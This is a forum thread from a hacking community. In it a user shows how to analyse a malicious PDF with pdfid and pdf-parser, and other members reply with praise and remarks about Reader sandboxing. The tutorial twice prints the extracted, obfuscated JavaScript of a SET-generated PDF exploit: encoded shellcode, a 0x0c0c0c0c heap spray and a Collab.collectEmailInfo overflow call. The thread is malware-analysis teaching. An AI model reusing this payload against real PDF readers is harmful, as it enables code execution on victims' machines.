Author Topic: Analyzing Malacious Malware Embedded in Adobe PDF Files  (Read 3961 times)

0 Members and 1 Guest are viewing this topic.

Offline Alkapone

  • NULL
  • Posts: 2
  • Cookies: 4
    • View Profile
Analyzing Malacious Malware Embedded in Adobe PDF Files
« on: September 30, 2013, 10:54:30 pm »
This tutorial is going to teach you how to  find malicious data within  PDF readers.

I find it pretty cool because  instead of  writing

strings #filename

gdb

objects

etc etc 

You dont need to  know all this  because there is a tool that simplifies  pulling information out of the PDF reader just like almost   "grep"


What you will need?

Python Instealled windows or  Linux

Code: [Select]
pdf-reader
pdfid


now im going to write this by myself without having to look up information so if i mess up ill fix it
im just writing this out to see how much of this i remembered.


When you open up a pdf file - PDF  incorporated a javascript  engine for the PDF reader

which allows the use of executing javascript code.

Malicious  Hackers will insert these javascript codes  into the objects within a  PDF file


and modifying strings and what not

So instead of  having 

/Javascript

a hacker will turn it into like /jAVAsCRIPT

etc etc

an example output

Code: [Select]
root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 1
 endstream              1
 xref                   1
 trailer                1
 startxref              1
 /Page                  1(1)
 /Encrypt               0
 /ObjStm                0
 /JS                    1(1)
 /JavaScript            1(1)
 /AA                    0
 /OpenAction            1(1)
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0

we can see that there is  embedded code within 
/JS
/JavaScript
/OpenAction


Notice at the top how  Openaction is changed to something else?

Its to obfuscate  AntiViruses 


Our goal is to pull the javascript code out of the  i call them tables  or objects however you say it


First command to execute

Disarm the PDF  files

Code: [Select]
python pdfid.py --disarm testfile.pdf

What this does is  change  the Case Sensitives in the Words to make it somethign else so when you open the .pdf file  it is safe and nothing will execute.


the  (1)  indicates that there is a obfuscation inside that table.

So now you have  basic information

Whats obfuscated

But now you need to go in deeper there is a software called

pdf-parser.py

pd-parser is nothing more then like a grep utility on linux  just that its made for  pulling contents out of the pdf file now.


So now we need to locate the embedded  malicious javascript code.

pdf-parser  has a grep utility where you can search for certain stuff within the pdf file

so execute this

Code: [Select]
python pdf-parser.py --search javascript filename.pdf

What this will do is search the contents of the pdf file for anything in relation to javascript

So this is what we get back

Code: [Select]
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>

Things to note here

1. object is  5
2. It uses javascript
3. As you can see the javascript is encoded but yet --search still found it  which is awesome
4. /type Action


So now we know that  javascript is included  object 5 and is  is getting referenced through object 6 as well

So what do we do now?

We pretty much just jump to the next location 

Since  5  is referencing  6   and  5 was referenced in  in the search for javascript   we know that the next
one  is going to be holding the javascript code its self

example

Code: [Select]
python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>


Notice :  /JS 6 0 R

So now we know JS is being held in   table 6

So now we will filter the jump and  paste the javascript code

Code: [Select]
python pdf-parser.py --object 6 --filter testfile.pdf

Code: [Select]
obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]

 <<
   /Length 6532
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>



And now we finally see the javascript code

Code: [Select]
>>

 '\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'




Obviously this is all crowded together   but if we want to organize it to show the code a lot better we will type

Code: [Select]

python pdf-parser.py --object 6 --filter --raw testfile.pdf

The  filter and raw will output it in readable format

Code: [Select]
        var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
        var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
        for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
        NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
        HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
        njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
        CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
        while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
        FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
        SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
        for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
        var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
        while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});




Which is now readable

But since this  software uses the 
Quote
/FlateDecode /ASCIIHexDecode]

You have to find a way to de-crypt it

I found a site that helps in analyzing those types of encryptions which can be located at

http://wepawet.cs.ucsb.edu.com


I was using  the SET ( Social Engineer Toolkit)  to generate a  malacious .pdf file

and then i analyzed it over with these tools


Note: Not all  malacious pdf files will incorporate that as a encryption method  and you may just get lucky
Sometimes there will be and sometimes there wont - There is like 4 other methods for encryption on this


The encrypted javacode you see up there was done by the SET encryption thing


Anyways i hope you learned something from this

And if i wrote this tutorial shitty im sorry

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #1 on: October 01, 2013, 06:28:36 am »
You could do something about the text formatting, maybe use bold for the titles etc.
Apart from that I think its a nice share , thanks for contributing :)
+1
« Last Edit: October 01, 2013, 06:29:04 am by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #2 on: October 01, 2013, 08:27:28 am »
That's a good tutorial, but I have to agree with proxx. I don't like the numerous empty lines, that looks like you wanted to stretch it or something.
+1 for you

Offline hydroxypropylcellulose

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -6
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #3 on: October 01, 2013, 08:32:17 am »
I agree, great tutorial.

+1

Offline Stackprotector

  • Administrator
  • Titan
  • *
  • Posts: 2515
  • Cookies: 205
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #4 on: October 01, 2013, 09:51:51 pm »
+1 for trying, now format it :)
~Factionwars

Offline p_2001

  • Royal Highness
  • ****
  • Posts: 684
  • Cookies: -64
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #5 on: October 02, 2013, 08:03:06 pm »
nice share, but the sandbox will block everything malicious in the pdf reader. I had some malicious pdf from 2008's. they dont execute anymore.
Dunno if the sandbox is broken yet.
"Always have a plan"

Offline hydroxypropylcellulose

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -6
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #6 on: October 02, 2013, 08:45:36 pm »
nice share, but the sandbox will block everything malicious in the pdf reader. I had some malicious pdf from 2008's. they dont execute anymore.
Dunno if the sandbox is broken yet.


If you scan it using VirusTotal that service checks for abnormalities and scripts in the document too.
« Last Edit: October 02, 2013, 08:45:48 pm by hydroxypropylcellulose »

Offline Alkapone

  • NULL
  • Posts: 2
  • Cookies: 4
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #7 on: October 02, 2013, 11:25:47 pm »
Can you send me those pdf's?

And you dont need a sandbox with this

Because you can disarm  the javascript in the adobe PDF reader


the command 

Code: [Select]
python pdfid.py --disarm testfile.pdf

Will manually chagne the  /Javascript  into  /J47d7xnsnsScrript

Therefore not allowing the Adobe PDF javascript engine   execute

Because  in the adobe pdf reader everything is god i cant remember the word

If it has /Javascript  /javascript  /JS  = Those will  execute

but /Ja8d7s899  stuff like that will not execute


Offline p_2001

  • Royal Highness
  • ****
  • Posts: 684
  • Cookies: -64
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #8 on: October 03, 2013, 12:26:57 am »
Can you send me those pdf's?

And you dont need a sandbox with this

Because you can disarm  the javascript in the adobe PDF reader


the command 

Code: [Select]
python pdfid.py --disarm testfile.pdf

Will manually chagne the  /Javascript  into  /J47d7xnsnsScrript

Therefore not allowing the Adobe PDF javascript engine   execute

Because  in the adobe pdf reader everything is god i cant remember the word

If it has /Javascript  /javascript  /JS  = Those will  execute

but /Ja8d7s899  stuff like that will not execute



I mean that while  learning this is fun, the reader sandbox wont let any embeded explot to make changes to the system. So trying to exploit the js is useless now. Unless you have some way to escape sandbox.
"Always have a plan"

Offline GoldDust

  • /dev/null
  • *
  • Posts: 17
  • Cookies: 0
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #9 on: November 15, 2013, 10:05:22 am »
Great tutorial. Thank you!

-GD

Offline Fed0t

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #10 on: April 19, 2014, 07:21:53 pm »
i am interested how they make this pdf exploits!

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #11 on: April 20, 2014, 01:42:03 am »
Can you send me those pdf's?

And you dont need a sandbox with this

Because you can disarm  the javascript in the adobe PDF reader


the command 

Code: [Select]
python pdfid.py --disarm testfile.pdf

Will manually chagne the  /Javascript  into  /J47d7xnsnsScrript

Therefore not allowing the Adobe PDF javascript engine   execute

Because  in the adobe pdf reader everything is god i cant remember the word

If it has /Javascript  /javascript  /JS  = Those will  execute

but /Ja8d7s899  stuff like that will not execute
Seriously, you don't need to start newlines early and double space. I don't understand why people feel the need to attack the Enter button so much. Just let the editor do it on it's own. Otherwise nice contribution n' shit.
« Last Edit: April 20, 2014, 02:08:28 am by lucid »
